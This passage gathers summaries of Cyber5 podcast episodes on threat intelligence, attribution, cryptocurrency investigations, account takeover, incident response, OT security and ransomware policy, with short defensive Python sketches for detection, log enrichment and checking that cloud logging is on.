In episode 63 of The Cyber5, we are again joined by Sean O'Connor, Head of Global Cyber Threat Intelligence for Equinix. We discuss attribution in the cyber threat intelligence and investigation space, and what the private sector can learn from public sector intelligence programs. We also discuss different levels of attribution, the outcomes, and the disruption campaigns that are needed to make an impact on cybercriminals around the world. We define the impact of attribution with different stakeholders throughout the business and how the intelligence discipline will likely evolve over the next five to ten years. Five Key Takeaways: 1) Lessons For Private Sector Intelligence Teams from the Public Sector National Security Apparatus (Intelligence Life Cycle, MITRE ATT&CK, Cyber Kill Chain) Many cybersecurity best practices and frameworks originate from the US public sector: Intelligence life cycle: Defining priorities and communicating intelligence to stakeholders Lockheed Martin Cyber Kill Chain: Defining broad malicious actions in IT networks MITRE ATT&CK Framework: Identifying more specific malicious movements in IT networks Structured analytical techniques developed by CIA analysts, such as Richard Kerr 2) Attribution is Critical in Cybersecurity to Warrant an Action Attribution of cyber threat actors by industry is still important as a starting point to derive appropriate controls for the SOC and the CERT within a large organization. How these threats pose a risk of monetary loss is an important element of context when presenting them to business executives. Here are two typical starting points: Review phishing telemetry for common TTPs and create rule-based detections based on phishing infrastructure used by actors. Conduct an external threat landscape assessment for TTPs, resulting in targeted threat hunts for the most notorious ransomware gangs. Creating custom detections is typically the outcome until the appropriate disruptions can be put in place. 3) Disruption Campaigns Happen with Successful Information Sharing Successful disruption campaigns come from non-public information sharing between vendors, enterprises, and public sector institutions like CISA or the FBI. They typically do not originate from marketing blog posts. 4) Threat Intelligence is a Service-Based Role that Goes Beyond the SOC Success in cybersecurity (SOC and CERT) is keeping security incidents limited to “events” and ensuring they do not escalate into breaches. This occurs when multiple stakeholders have the proper visibility to ensure network telemetry is complete, accurate, and truthful. However, due to the service nature of intelligence work, it goes beyond just the SOC. 5) Threat Intelligence Should be a Floating Team for the Business Threat intelligence should be a floating team that can operate outside of the SOC and is an asset to the overall business, not just limited to combating cyber threats. Often executives want intelligence on mergers and acquisitions and market entry in a given geopolitical area, and threat analysis needs to be tailored to different customers. A Chief Intelligence Officer may be more widely accepted in the future as the needs of the business expand and diversify.
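As a concrete illustration of the first starting point above, here is a minimal sketch of a rule-based detection that flags inbound mail whose sender domain, sending IP, or embedded links match known phishing infrastructure. The indicator lists and mail-log fields are hypothetical; a production detection would live in a mail gateway, SIEM rule, or EDR policy rather than a standalone script.

```python
"""Minimal sketch: rule-based detection against known phishing infrastructure.

The indicator sets and mail-log record shape are hypothetical stand-ins for
whatever a mail gateway or SIEM would actually provide.
"""
import re
from urllib.parse import urlparse

PHISHING_DOMAINS = {"secure-login-example.net", "invoice-update-example.org"}
PHISHING_IPS = {"198.51.100.23"}

URL_PATTERN = re.compile(r"https?://[^\s\"'>]+")

def extract_domains(body: str):
    """Pull hostnames out of any URLs found in a message body."""
    return {urlparse(u).hostname for u in URL_PATTERN.findall(body) if urlparse(u).hostname}

def evaluate(message: dict):
    """Return a list of rule hits for one mail-log record."""
    hits = []
    sender_domain = message["from"].rsplit("@", 1)[-1].lower()
    if sender_domain in PHISHING_DOMAINS:
        hits.append(f"sender domain on phishing infrastructure list: {sender_domain}")
    if message.get("source_ip") in PHISHING_IPS:
        hits.append(f"sending IP on phishing infrastructure list: {message['source_ip']}")
    for domain in extract_domains(message.get("body", "")):
        if domain.lower() in PHISHING_DOMAINS:
            hits.append(f"embedded link points to phishing infrastructure: {domain}")
    return hits

if __name__ == "__main__":
    msg = {"from": "billing@secure-login-example.net", "source_ip": "203.0.113.77",
           "body": "Please verify at https://secure-login-example.net/reset"}
    print(evaluate(msg))
```

Detections like this are the interim control; the longer-term outcome, as noted above, is disruption through information sharing.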
In episode 62 of The Cyber5, we are again joined by Charles Finfrock, CEO and Founder of Black Hand Solutions. Charles was previously the Senior Manager of Insider Threat and Investigations at Tesla and, prior to that, he worked as an Operations Officer for the Central Intelligence Agency. We discuss the generalities of cryptocurrency and go into the tactics, techniques, and procedures for conducting cryptocurrency investigations. We also discuss some case studies and what proper outcomes look like for making it more expensive for adversaries to conduct their operations in this generally unregulated world. Three Key Takeaways: 1) Generalities, Functionalities, and Value of Bitcoin and Cryptocurrency In its simplest form, cryptocurrency is digital coins or money (Bitcoin and Ethereum being the most popular). It is not run or governed by a central authority, but by a mathematical algorithm that verifies transactions, controls the supply of the coin, and runs on the blockchain. Blockchain, as it pertains to cryptocurrency, is a ledger that verifies what has been sent and received from an account. It is pseudo-anonymous, not anonymous, which is why criminals have been leveraging it so aggressively. When Bitcoin is transacted, the amounts sent and received are recorded on the Bitcoin ledger (blockchain) and associated with a cryptocurrency wallet address. Criminals think they can hide their identities because no formally validated identity is required through a central authority. Since cryptocurrency is not controlled by a central government, no one can modify the supply of a particular cryptocurrency. It derives value in the same way the US dollar used to derive value from gold: scarcity. The argument for Bitcoin's value is similar to that of gold, a commodity that shares characteristics with the cryptocurrency. Bitcoin is limited to a supply of 21 million coins, and its value is a function of this scarcity. 2) Conducting Cryptocurrency Investigations - Decreasing Return on Investment to Criminals When criminals first started using cryptocurrency in 2012, it was because they thought they could hide their identity. At the time, tools were not available to law enforcement to unmask and attribute actions to persons. That has changed. The two kinds of investigations that clients engage in are reactive and proactive. Reactive investigations occur when scams have already been perpetrated against their brand. Proactive investigations occur when security teams engage with actors to uncover the scam before a significant amount of loss occurs. Legal and technical methods can be deployed to “burn down the infrastructure” and decrease the return on investment for online criminals. Oftentimes an outcome can be to contact a centralized bank or cryptocurrency exchange (e.g., Coinbase) that is linked to the cryptocurrency as a means to “cash out” the criminal proceeds, report the fraud, and disrupt the activity, thus increasing the costs to the criminals. 3) Provenance and Repudiation To Understand Truth, Accuracy, and Completeness As with any online crime investigation, investigative techniques identify stylometric attributes of the criminal infrastructure that reveal the provenance of data by the malicious actor. In the end, this provides authorities the ability to repudiate the scheme in the future.
Often what we look for are lapses in operational security by the threat actors, which include but are not limited to the following: An actor registered a domain and failed to enable private registration before correcting their mistake. An actor forgot to use their VPN or proxy to connect to their C2 infrastructure and revealed their source IP range. An actor reused certificates on different infrastructure or failed to properly encrypt their C2 traffic. Going a step further, we pivot from technical analysis to open source intelligence (OSINT) to add valuable context to the nature of the threat an organization faces. By exposing network infrastructure and drawing associations using threat information and other technology-enabled OSINT connections, we can determine the motivation and sophistication of the threat. We assess characteristics such as: Content, stylometric attributes, and similarities between criminal persona accounts and true-name accounts. Re-use of content in a spearphish that was similar to content existing elsewhere, such as blog or social media posts. Re-use of usernames or email addresses to register a malicious domain or subscribe to a third-party file server or virtual private server. Photographs that provide traceable location details such as landmarks or geographical attributes. Screenshots, files, or photos used by the actor that leave vital forensic clues revealing real identity or location. Details ascertained through direct engagement with the threat actor.
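As an illustration of how such lapses are pivoted on in practice, here is a minimal sketch that clusters domain registration records by reused registrant email or handle, the kind of overlap that can connect a criminal persona to a true-name account. The record format is a hypothetical, simplified WHOIS-style export, not a real registry API, and real investigations would correlate many more selector types (file servers, VPS subscriptions, social media accounts).

```python
"""Minimal sketch: cluster domains by reused registrant selectors (emails, handles).

Records are a hypothetical, simplified registration-style export; real cases
pull selectors from many sources before correlating them.
"""
from collections import defaultdict

def cluster_by_selector(records, selector_fields=("registrant_email", "registrant_handle")):
    """Return {selector_value: [domains...]} for selectors seen on 2+ domains."""
    clusters = defaultdict(set)
    for rec in records:
        for field in selector_fields:
            value = (rec.get(field) or "").strip().lower()
            if value:
                clusters[value].add(rec["domain"])
    return {sel: sorted(domains) for sel, domains in clusters.items() if len(domains) > 1}

if __name__ == "__main__":
    records = [
        {"domain": "invoice-update-example.org", "registrant_email": "ops.persona@example.com"},
        {"domain": "secure-login-example.net", "registrant_email": "ops.persona@example.com",
         "registrant_handle": "shadowfox"},
        {"domain": "personal-blog-example.com", "registrant_handle": "shadowfox"},
    ]
    # Reused selectors tie the malicious domains to a possible true-name account.
    for selector, domains in cluster_by_selector(records).items():
        print(selector, "->", domains)
```

The automation only surfaces candidate links; analysts still assess content, stylometry, and direct engagement before drawing conclusions about identity.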
In episode 61 of The Cyber5, we are joined by Josh Shaul, CEO of Allure Security. We discuss cybersecurity and account takeovers. We focus on the lifecycle of an account takeover, how to permanently solve it, and how to show a clear return on investment to small business owners. We also talk about how to impede attackers by making their efforts more costly and difficult. Four Key Takeaways: 1) Account Takeovers An account takeover is a form of identity theft and fraud where a malicious third party successfully gains access to a user's account credentials. Previously targeted at large enterprises, these attacks are now targeting SMBs. 2) Disrupting the Attacker's Return on Investment By automating defenses and rapidly removing fake websites, attackers face increased costs and less success. 3) Too Much Marketing Focus on APTs A lot of cybersecurity products and technology focus on advanced persistent threats (APTs) and ignore the threats that matter. Organizations can best protect themselves by mapping technology to the threats that are actually targeting them. 4) Intelligence Must be Actionable Making intelligence actionable is necessary for proper security regardless of an organization's size. For many organizations, this is most easily achieved through managed service providers that provide people, process, and technology that are otherwise not attainable for small enterprises.
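Account takeover campaigns often surface first as credential stuffing: one source hitting many different accounts with mostly failed logins. Here is a minimal sketch of that heuristic over authentication logs; the log fields and thresholds are hypothetical and would need tuning against real traffic before being trusted in production.

```python
"""Minimal sketch: flag possible credential stuffing (a common account-takeover
precursor) when one source IP fails logins against many distinct accounts.

Log record shape ({"ts", "src_ip", "username", "success"}) and thresholds are
hypothetical; real deployments tune these against observed traffic.
"""
from collections import defaultdict

def flag_credential_stuffing(auth_events, min_accounts=10, max_success_rate=0.1):
    """Return suspicious source IPs with counts of distinct targeted accounts."""
    per_ip = defaultdict(lambda: {"accounts": set(), "attempts": 0, "successes": 0})
    for e in auth_events:
        stats = per_ip[e["src_ip"]]
        stats["accounts"].add(e["username"])
        stats["attempts"] += 1
        stats["successes"] += 1 if e["success"] else 0

    flagged = {}
    for ip, stats in per_ip.items():
        success_rate = stats["successes"] / stats["attempts"]
        if len(stats["accounts"]) >= min_accounts and success_rate <= max_success_rate:
            flagged[ip] = {"distinct_accounts": len(stats["accounts"]),
                           "attempts": stats["attempts"],
                           "success_rate": round(success_rate, 3)}
    return flagged

if __name__ == "__main__":
    events = [{"ts": i, "src_ip": "203.0.113.50", "username": f"user{i}", "success": False}
              for i in range(25)]
    print(flag_credential_stuffing(events))
```

Detection is only half the disruption: raising the attacker's cost also means rapid takedown of the fake websites that harvest the credentials in the first place.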
In episode 60 of The Cyber5, we are joined by Tom Thorley, the Director of Technology at the Global Internet Forum to Counter Terrorism (GIFCT). We discuss the mission of GIFCT and how it has evolved over the last five years, with particular interest in violent terrorist messaging across different social media platforms. We also discuss the technical approaches to countering terrorism between platforms and how the organization accounts for human rights while conducting its mission. Four Key Takeaways: 1) The Evolving Mission of GIFCT GIFCT combats terrorist messaging on digital platforms and is particularly focused on removing live streaming of violence. It was founded in 2017 by Microsoft, Facebook, YouTube, and Twitter, mostly to combat advanced ISIS messaging efforts across their platforms, particularly after several high profile terrorist attacks were live streamed. GIFCT has grown to include 17 different technology companies that participate in the mission of combating terrorist exploitation of their platforms. Since ISIS has been degraded over the last three years, GIFCT has expanded its mission to include supporting the United Nations Security Council's Consolidated Sanctions List. 2) Behavioral Models as Opposed to Group Affiliation Due to the fast adaptation and evolution of terrorism, GIFCT has moved to track behavioral models of violence rather than attempt to focus on known terrorist groups. They built out an incident response framework to review emergency crisis situations using technology called “hash sharing.” Now, they are looking at expanding into: Manifestos from terrorist attacks just carried out Terrorist publications with specific branding (such as al-Qaeda's Inspire Magazine) URLs, videos, and images where specific terrorist content exists across platforms 3) Hash Sharing Across Social Media Platforms with Content User-created content is not associated with an identifiable individual in the way an IP address is generally tied to a device. When GIFCT hashes videos, they not only use traditional MD5 hashes, but also perceptual hashes, which are locality sensitive. These hashing techniques, and the different algorithms provided by the technology companies, allow images, videos, and URLs to be flagged and potentially removed from the platform in close to real time. There is some new hash sharing technology being explored around PDFs. The need has been driven in part because malware detection relies on the manipulated backend code of a PDF, whereas terrorist manifestos are not manipulated; they are just content. GIFCT is exploring technology to hash certain content strings in PDFs for alerting. 4) Optimizing for Human Rights GIFCT hashing algorithms minimize impact to human rights during emergency situations and differentiate between legitimate journalism and normal discord between people on a platform. GIFCT goes through tremendous transparency initiatives that focus its algorithms on violent extremism.
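To make the perceptual hashing idea concrete, here is a minimal, illustrative average-hash: an image reduced to a tiny grayscale grid becomes a bit string, and near-duplicate images produce hashes that differ in only a few bits (a small Hamming distance). The production locality-sensitive hashes used in hash-sharing programs are far more robust; this sketch only shows why perceptual hashes, unlike MD5, survive small edits and re-encodes.

```python
"""Minimal, illustrative average-hash: near-duplicate images yield hashes with a
small Hamming distance, unlike cryptographic hashes such as MD5, which change
completely on any edit. Real locality-sensitive hashes are far more sophisticated;
this is a teaching sketch only.
"""

def average_hash(gray_pixels):
    """gray_pixels: a small 2D list of grayscale values (e.g., 8x8, already resized)."""
    flat = [p for row in gray_pixels for p in row]
    mean = sum(flat) / len(flat)
    # One bit per pixel: brighter than the mean or not.
    return "".join("1" if p > mean else "0" for p in flat)

def hamming(h1, h2):
    """Number of differing bits between two equal-length hashes."""
    return sum(a != b for a, b in zip(h1, h2))

if __name__ == "__main__":
    original = [[10, 200], [200, 10]]
    slightly_edited = [[12, 198], [201, 11]]   # re-encoded / lightly altered copy
    unrelated = [[200, 10], [10, 200]]

    h_orig = average_hash(original)
    print(hamming(h_orig, average_hash(slightly_edited)))  # small -> likely a match
    print(hamming(h_orig, average_hash(unrelated)))        # larger -> different content
```

Matching on distance rather than exact equality is what lets member platforms flag altered copies of the same violent content without sharing the content itself.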
In episode 59 of The Cyber5, we are joined by active security compliance practitioner Dylan McKnight. We discuss the business of security. We unpack how security can be effective at driving profitability and not just be a cost center for an organization. We discuss how compliance measures can drive meaningful metrics around profitability and avoiding breaches. And finally, we talk about where threat intelligence provides the proper risk-based approach for security teams in this process. Five Key Takeaways: 1) Making “Security” Be Seen as More than Just a “Cost Center” Prioritize external-facing business leaders and help them become security stakeholders. Give Sales, Customer Success, and Marketing a reason to care about security. In the technology space it's important to understand how your organization makes money. You must embed security practices into contracts to ensure your organization is being a good steward of each department's data. Third-party risk management processes are an example of how this shows up every day. In the pre-close world, work with the sales team to ensure security functions are helping to close deals faster. As a communicator, you must also improve customer relationships through privacy programs and a good incident notification policy after the sale. You must still maintain key relationships with necessary internal stakeholders such as: Internal auditors who will answer to regulators (SOC 2, ISO certification, etc.) The engineering team and its product development cycle Legal and HR 2) Security Roadmap is Critical with Limited Resources It's critical for security practitioners to understand that the vortex of power within technology companies is centered around the sales and product engineering teams. Security practitioners lament that they don't get enough time in front of internal decision makers, which is why they need to embed themselves in the sales cycle. Critical security functions like identity and access management (IAM) and file integrity monitoring are two examples that have value but are time intensive and don't necessarily improve the bottom line unless they are part of customer contracts. However, privacy requirements are becoming critical to engineering and sales teams, and a security program should be adapted to meet those needs first. 3) Developing GTM-focused Security Playbooks that Scale with Business Growth Risk assessments for what could cause the most business loss are an important starting point, backed by standards and controls that align to this potential loss. “Move fast and break things” can carry monetary losses in security, so it's important to go to quarterly business reviews with the sales team and understand the pain points in the sales process. Security should exist to help sales move through the process more quickly while illuminating potential risk. 4) Compliance is Important for Maintaining Customers It's cheaper to keep existing customers than to gain new ones. To keep existing customers, trust becomes a critical aspect. Transparency around security controls and incident notification with your customers can go a long way toward keeping them satisfied during renewals. Compliance standards that meet these transparency requirements are beneficial for building trust with customers, including the right levels of monitoring of cloud infrastructure and managed detection and response.
It's important to understand how all the different teams use data in the environment and protect what really matters, which in technology companies is usually the “least privilege” permissions around the production environment. 5) The Role of Threat Intelligence in Risk Assessments Risk-based approaches are always a good starting point. Threat intelligence should be geared toward who, how, and why threat actors are actually attacking your organization. Simple defenses should be built around threats that are happening, not just what is possible. This means not only monitoring the dark and open web, but also closely analyzing your firewall logs and providing an “outside-in” inspection that enriches your internal telemetry with external signals for more risk-based context and prioritization.
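A minimal sketch of that "outside-in" enrichment: firewall log entries are annotated with external context (historical domain resolutions, a threat tag) from lookup tables so analysts can prioritize on risk rather than raw volume. The log fields and context sources here are hypothetical; a real pipeline would pull from passive DNS, ASN data, and threat intelligence feeds.

```python
"""Minimal sketch: enrich firewall log entries with external context for
risk-based prioritization. The log record shape and context tables are
hypothetical stand-ins for passive DNS, ASN, and threat feed lookups.
"""

PDNS_CONTEXT = {"198.51.100.23": ["invoice-update-example.org", "secure-login-example.net"]}
THREAT_TAGS = {"198.51.100.23": "known phishing infrastructure"}

def enrich(firewall_events):
    """Attach external context to each event and sort the risky ones first."""
    enriched = []
    for e in firewall_events:
        ip = e["dst_ip"]
        enriched.append({
            **e,
            "historical_domains": PDNS_CONTEXT.get(ip, []),
            "threat_tag": THREAT_TAGS.get(ip),
        })
    # Events with a threat tag float to the top of the analyst queue.
    return sorted(enriched, key=lambda e: e["threat_tag"] is None)

if __name__ == "__main__":
    events = [{"ts": 1650000000, "src_ip": "10.0.0.5", "dst_ip": "198.51.100.23", "action": "allow"},
              {"ts": 1650000001, "src_ip": "10.0.0.7", "dst_ip": "192.0.2.10", "action": "allow"}]
    for e in enrich(events):
        print(e)
```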
In episode 58 of The Cyber5, we are joined by Magen Gicinto, Director of People Strategy and Culture for Nisos. We discuss the “Great Resignation” that is happening in the work environment during the COVID pandemic and how to realign your “people strategy” to recruit and retain the best talent in spite of those challenges. We address the aspects of recruiting and retaining the best talent and how to calibrate total rewards in consideration of employees' ever-changing motivations. Finally, we cover the nature of startup culture in the technology sector and the convergence of generalists and specialists in high performance organizations. Four Key Takeaways: 1) Recruiting and Retaining Talent During the COVID-19 Pandemic Employees who would have otherwise left their jobs decided to stay put during the pandemic. Now, even though we are still in its throes, people feel safe again to move jobs, which is leading to unprecedented turnover in the global workforce. In fact, according to statistics published by the U.S. Department of Labor, voluntary turnover dipped significantly in 2020, but in early 2021, it jumped higher than ever before, with 4 million people leaving jobs in April 2021 alone in the U.S. Employees who are looking for new opportunities and want to integrate work and life responsibilities are looking for employers who support those values. What remains constant is that employees continue to want opportunities for career advancement and building their skill sets. One core solution for employers is to reimagine the employee experience so you can keep your best people and recruit great talent. Understanding what your employees value and what motivates them is key to reducing churn and attracting new people. High performing People Strategy departments are adept at creating employee engagement, from onboarding through the employee lifecycle, that helps satisfy employee motivations throughout their tenure with an organization. 2) Experiential Support to Employees Is Critical Organizations that invest heavily in creating the best employee experience will have better success at recruitment and retention. Organizations and teams are most successful when the organization's strategies, structure, and culture are aligned. During the infancy stage of startups, there is little consistency for people to hang on to. Leaders are focused on doing what they can to source and hire the best talent, while outsourcing other services. Once you move past the infancy stage and start growing, your attention needs to move to ensuring stability and creating a life cycle for employees. Employees who are embedded into the organization from day one and who experience a strong onboarding regimen will have more staying power and satisfaction with the organization. While white-glove onboarding is not always achievable at the startup level (based on lean staffing), companies that can find the resources to do so win it back with stronger employee integration from day one. 3) Challenge Playbooks to Create the Best Employee Experience Here are some ways to create an environment where employees can succeed and grow within an organization. This is especially crucial within cybersecurity, where the stakes can be higher and the goalposts can move more quickly.
Set clear goals Be consistent in performance management Understand what obstacles are in the way of employees performing at their best so you can help remove barriers to their success Keep the lines of communication open Have honest, fact-based conversations so that when they have concerns about their job or their performance, you're prepared to address things with perspective. 4) Prevent Silos and Bring People Together When New Departments are Created When recruiting, look for talent who create value and can deliver on company objectives. Employees want to have purpose in their work and know that they're making a difference. As a startup organization, you have a great opportunity to create and influence organizational decisions and add value. Hire individuals who are up for the challenge and want to lean into the company's goals with the team. To avoid departmental silos, it's important to: Attract and help select the best talent that meets the business's needs Close any skills gaps Recruit people who value differences in perspectives Look for ways to create new and better ways for the organization to be successful Hire people who are likely to drive results and tackle new challenges, using both success and failure as learning opportunities Bringing different departments into the recruitment and retention process helps avoid silo-type organizations. It creates more alignment and helps employees understand what's going on in the business. Once a new hire comes on, all of the departments are similarly invested in the individual and can incorporate them, which allows both the new hire and the organization to begin utilizing their skill sets effectively.
In episode 57 of The Cyber5, we are joined by Colby Clark, Director of Cyber Threat Management. He's also the author of the recently published book, The Cyber Security Incident Management Master's Guide. We baseline incident response playbooks around customer environment, threat landscape, regulatory environment, and security controls. Afterward, we discuss how incident response (IR) playbooks have evolved in the last five years and how they have scaled in the cloud. We discuss telemetry that is critical to ensure an IR team can say with confidence that an incident is accurate, complete, and truthful in order to avoid breaches. Lastly, we discuss the criticality of threat intelligence in the IR process and what boards really care about during an incident. Four Topics Covered in this Episode: The Shift in Incident Response Playbooks Playbooks used to be contact lists and an outline of the roles and responsibilities of who to call during a cybersecurity incident, typically based on recovery from natural disasters. Today, threat-based playbooks are more specific, actionable, and tailored to enterprise environments, based on compliance and insurance requirements. In Clark's book, and in his work with clients, 13 distinct domains are relevant for baselining these playbooks, including customer environment, threat landscape, regulatory environment, and security controls. Most importantly, incident management is a repeatable process over a period of time that adapts to regulators. Enterprise solution tooling is always behind the tooling of the attackers, and therefore gap analysis within IR playbooks is a constant job for any IR team. The Need for Consolidating Cybersecurity Solution Tools Security practitioners sometimes struggle with knowing the business functionality of applications and systems within enterprise networks, which makes identifying what is normal or malicious challenging. If security technology is not tuned with consideration for the people and process involved, the tooling is useless. Network encryption pervasiveness is making network traffic analysis tools increasingly irrelevant; all important telemetry, to reduce visibility gaps, is moving to the endpoint (devices, servers). Realizing that big companies cannot have endpoint detection and response (EDR) agents on every endpoint means some network traffic capture is still important. Incident Response Migration and Evolution to the Cloud Tooling: In 2014, EDR tools started to be developed that took over from antivirus software and have since detected 80% of breaches. EDR, and now XDR (Extended Detection and Response), solutions that operate in the cloud (AWS, GCP, Azure) are the only means to quickly detect and recover from cyber incidents, especially with a distributed workforce. Protecting the Environment: Customer applications that run on cloud servers (production and non-production) bring tremendous frustration to incident response efforts. They do not have visibility on par with their physical counterparts, particularly with containers. They have reduced controls and limited investigative capabilities, allowing malicious backdoors into environments. Important Strategies: First, maintain, update, and patch baseline images for containers. Second, turn on logging; nothing is logged in cloud environments by default. Companies have to pay extra money to turn on logging and pay additional licensing fees for security tools (CloudTrail logging for AWS, for example).
Third, turn on network decryption at the right points. Last, keep EDR tooling maintained. The Importance of Threat Intelligence in Cloud Security Threat intelligence should be built into EDR logging by default and will likely be part of the XDR paradigm in the future. A deep-dive RFI (request for information) capability must also be included to ascertain whether the intelligence is directly relevant to the organization or just an industry trend.
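As one concrete example of the "turn on logging" guidance, here is a minimal sketch that checks whether CloudTrail trails exist and are actively logging in an AWS account, using the boto3 SDK. It assumes boto3 is installed and AWS credentials and a region are already configured in the environment; it only reads trail status and does not create or modify anything.

```python
"""Minimal sketch: verify that AWS CloudTrail logging is actually turned on.

Assumes boto3 is installed and AWS credentials/region are configured in the
environment; this only reads trail status, it does not change anything.
"""
import boto3

def check_cloudtrail_logging(region_name=None):
    """Print each trail and whether it is currently logging; warn if none exist."""
    client = boto3.client("cloudtrail", region_name=region_name)
    trails = client.describe_trails().get("trailList", [])
    if not trails:
        print("WARNING: no CloudTrail trails configured; nothing is being logged.")
        return
    for trail in trails:
        status = client.get_trail_status(Name=trail["TrailARN"])
        state = "logging" if status.get("IsLogging") else "NOT logging"
        print(f"{trail['Name']}: {state} (multi-region={trail.get('IsMultiRegionTrail')})")

if __name__ == "__main__":
    check_cloudtrail_logging()
```

A scheduled check like this is a cheap guard against the "nothing is logged by default" problem, since an IR team without cloud logs has very little to investigate.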
In episode 56 of The Cyber5, we are joined by Ray O'Hara, Executive Vice President for Allied Universal. We discuss the use of intelligence for corporate security programs, usually overseen by a Chief Security Officer (CSO). We talk about some of the challenges this role faces and how intelligence can be actionable to mitigate those risks. We also work through various case studies, talk about metrics for success, and discuss what technology platforms are used to aggregate intelligence that might be useful in the future. Four Topics Covered in this Episode: Role Shift for Chief Security Officers (CSO) For many large organizations, the chief security officer is the chief strategist for organizing the holistic security strategy and obtaining board approval for the organization. CSOs are no longer in the day-to-day planning around “guns, guards, and gates.” Instead, they are more strategically focused on business continuity, emergency planning, and crisis management. Risk to business leaders drives the daily activities of CSOs. They need to understand that other business leaders may choose to work around a threat to execute against profit and loss. Intelligence Sources for Chief Security Officers Having a dedicated intelligence analyst is an important asset to a chief security officer. Emerging markets, information on key suppliers, and competitor data are routine tasking for an intel analyst who is subordinate to the CSO. Since security is a necessary cost center on the administrative side of organizations, intelligence analysts need trusted partners to handle the collection and analysis side of intelligence, including social media. Additionally, intelligence analysts ensure that collection and analysis are tailored to business management requirements. Sentiment Analysis Combines CISO and CSO Functions Negative sentiment against a company's brand traditionally falls within the CSO's GSOC function. However, this responsibility is starting to move toward information security due to threats to the confidentiality, integrity, and availability of data, systems, and networks, including from the dark web. As long as coordination is present, it doesn't matter whose lane covers social media sentiment analysis. Social Media Monitoring Critical For Reducing Executive Protection Resources Executive protection is expensive when a physical security threat escalates. Effective social media monitoring and direct threat actor engagement help derive the most accurate protective intelligence. They can be a more cost-effective way to monitor the danger than 24x7 surveillance.
In episode 55 of The Cyber5, we are joined by Nate Singleton, a security practitioner who was most recently the Director of IT, Governance, and Incident Response at Helmerich and Payne. We discuss the conundrums of operational technology (OT) security within the oil, gas, and energy sectors, including risks downstream and upstream. We also compare the aggressive and constant need for interconnectivity on the information and operational technology sides of the house to show that events like the Colonial Pipeline ransomware attack are probably just the beginning of future attacks against critical infrastructure. We also discuss what more major oil and gas companies can do to help improve cybersecurity for the small companies critical to the oil and gas supply chain. Five Topics Covered in this Episode: Operational Technology is Built to Last, Bringing Nuance to Security The underlying technology controlling oil, gas, and energy PLCs runs on Linux and Windows servers from 20 years ago, and patching for upgrades is expensive and requires a lot of downtime. Routine vulnerability scanning against an entire IP block, often seen within regular IT environments, can cause major damage, even resulting in the loss of human life, if not conducted carefully and properly in OT environments. Interconnectivity Comparisons Between Legacy Silicon Valley Tech and Operational Tech Development Security takes a back seat in operational technology for the energy industry, just as it does in Silicon Valley product development. The bigger challenge is often integrating regular IT and application developments that need constant upgrades with OT technology that can't take the upgrades on time. A “move fast and break things” mentality in OT could get someone killed. Ransomware and other malware events have the capacity to take down OT production lines for weeks, costing millions of dollars. The Colonial Pipeline ransomware event attacked only the IT environment, not the OT environment, yet it demonstrates the potential for future calamities to occur. Attacks Against Oil and Gas are Geopolitical in Nature and Will Likely Get Worse Attacks against critical infrastructure are going to get worse, and the attacks are often conducted by nation states who have the time to build exploits against the IT environment and are also leveraging sophisticated OT technology. Strategies for Protecting Operational Technology in ONG OT security means protecting the IT administrators who can access oil rigs, energy systems, and OT devices. Reporting must make it from the OT systems to the corporate IT systems so the business can see profit and loss. Therefore, many critical infrastructure operators use the Purdue Model to segment different layers of network infrastructure, from the machinery up to different levels of the corporate environment, so customers can be billed. More granular strategies include: Updated EDR products in the corporate environment Multi-factor authentication separating corporate and OT environments Separate domains for engineers' ability to browse the internet, check email, and upgrade software on the OT networks Robust firewall policies on the network layer controlling port and protocol connectivity back and forth Threat Intelligence for OT Security Integrating Indicators of Compromise (IOCs) into a SIEM has become an antiquated practice, but IOCs are still valuable for OT environments since those environments are modeled around constant connectivity and uptime.
Client-specific intelligence of what threat actors are doing is most critical because the remediations will take place over weeks and months. A cost-benefit analysis is always going to be levied when allocating resources to fix vulnerabilities. A “block all” approach to threat intelligence is not going to work.
In episode 54 of The Cyber5, we are joined by Aaron Barr, Piiq Media's Chief Technology Officer. We discuss how data breaches are combined with other open source information to paint a more holistic target profile for bad actors. We also discuss the information anchors and weaponization that can lead to an online attack against someone. Finally, we discuss what executives and individuals can do to protect themselves and how protective intelligence is playing a greater role in physical security. Three Topics Covered in this Episode: Common Information Anchors Used to Attack Someone Online Connection to an organization indicating that someone is likely a high net-worth individual. Communication platform for content delivery, including email address, social media platform, phone number, etc. Context for authenticity: the social engineering approach must have the right information about an individual for increased success. Best Practices for Staying Safe on the Internet Keep social media postings about personal information, locations, jobs, and education as simple as possible. Be careful not to post pictures with background details that give your location or family profile to potential attackers. Ensure profile pictures are minimal, as those are public regardless of whether everything else is private. Password managers should be used for personal accounts. People should have at least three personal email addresses, siloed by purpose: a) social media accounts, b) bank accounts or personal information, and c) a throwaway for rewards, e-commerce, and gifts. Education and Awareness Training Still Important Education for executives and the workforce about simple measures, such as the ability to flag suspicious emails so they get escalated to the security team, still goes a long way in securing the workforce.
In episode 53 of The Cyber5, we are joined by Ciaran Martin, the former CEO of the United Kingdom's National Cyber Security Centre and former Director General for Cyber Security at GCHQ. He is currently a professor at the University of Oxford and a strategic advisor for Paladin Capital. We discuss the political, legal, and ethical challenges of today's ransomware threats and the corresponding nation state challenges of Russia, China, and Iran. We also discuss what the U.S. and global economies can do to reduce these threats and how the financial industry can assist in a greater capacity. Four Topics Covered in this Episode: Ransomware's Social Impact Escalates to National Security Priority With semiconductor shortages caused by the pandemic and corresponding geopolitical rifts between the U.S., Russia, and China, ransomware is at the center of national security threats. While ransomware actors are just organized criminals, three characteristics have made this a broader national security threat: Russia and surrounding states allow criminality to flourish. Cybersecurity problems exist in western economies due to vulnerabilities caused by poor security practices within development lifecycles. Ransomware business models position criminals for success. Executives don't understand cybersecurity, and immediate business impact motivates them to pay the ransom. China Wants Authoritarian Control over Technology; Russia Wants a New Cold War The U.S. and Western model of technology has created flaws that lead to ransomware. The “move fast and break things” mantra of Silicon Valley prioritizes connectivity over security. The Chinese model is one of consistent integration, overwatch, authority, and frugality. Russia seeks regional control and the overall weakening of democracies through disinformation and offensive computer network exploitation operations. Commonalities and Differences of Combating Ransomware Actors and Other Non-State Actors Key Differences: Ransomware actors are not yet causing widespread harm to individuals. If this starts to occur, we could see increased offensive campaigns against ransomware actors similar to what we've seen against other non-state actors. Non-state actors of the last 15 years usually operated out of failed states, whereas ransomware actors enjoy state protection in many cases. Key Commonalities: The world's economies will eventually join to stop the movement of money used by ransomware actors, repeating what happened to the non-state actors of the last 15 years. The Financial Sector Must Step Up to Stop Ransomware Cybersecurity risk is well understood by the major financial institutions as it pertains to their own security. Cybersecurity, fraud, insider theft, and general resilience are well understood and defended by the major banks. Cryptocurrency and the money laundering aspects of cybersecurity are still major opportunities for 